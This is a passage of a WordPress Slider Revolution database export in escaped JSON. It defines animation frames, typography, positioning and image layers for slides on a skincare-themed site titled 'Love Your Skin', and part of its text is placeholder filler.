:{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"12\":{\"text\":\"Dicam disputando est no, idque patrioque gubergren id cum, mei posse elitr argumentum et. Nam impetus eleifend vituperatoribus ad, idque menandri in his justo primis.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":12,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\",\"e\":true}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-235px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"178px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#767676\",\"e\":true},\"n\":{\"v\":\"#767676\",\"e\":true},\"t\":{\"v\":\"#767676\",\"e\":true},\"m\":{\"v\":\"#767676\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#767676\",\"e\":true},\"n\":{\"v\":\"#767676\",\"e\":true},\"t\":{\"v\":\"#767676\",\"e\":true},\"m\":{\"v\":\"#767676\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"13\":{\"text\":\"Love Your Skin\",\"alias\":\"Title\",\"uid\":13,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-343px\",\"e\":true},\"n\":{\"v\":\"-220px\",\"e\":true},\"t\":{\"v\":\"-36px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"n\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"t\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"m\":{\"v\":1.111111111111111160454356650006957352161407470703125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-557px\",\"e\":true},\"n\":{\"v\":\"-452px\",\"e\":true},\"t\":{\"v\":\"-252px\",\"e\":true},\"m\":{\"v\":\"-252px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(11,5,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f5f5f5\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Slova\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h4-slide1-graphic7-1.png\",\"imageId\":3310},\"size\":{\"width\":{\"d\":{\"v\":\"1637px\",\"e\":true},\"n\":{\"v\":\"1376px\",\"e\":true},\"t\":{\"v\":\"1376px\"},\"m\":{\"v\":\"1376px\"}},\"height\":{\"d\":{\"v\":\"1066px\",\"e\":true},\"n\":{\"v\":\"896px\",\"e\":true},\"t\":{\"v\":\"896px\"},\"m\":{\"v\":\"896px\"}},\"originalWidth\":1637,\"originalHeight\":1066,\"aspectRatio\":{\"d\":{\"v\":1.53564727954971846912712862831540405750274658203125},\"n\":{\"v\":1.53564727954971846912712862831540405750274658203125},\"t\":{\"v\":1.53564727954971846912712862831540405750274658203125},\"m\":{\"v\":1.53564727954971846912712862831540405750274658203125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-20px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"v\":\"-3px\"},\"m\":{\"v\":\"-3px\"}},\"y\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"2px\"},\"m\":{\"v\":\"2px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 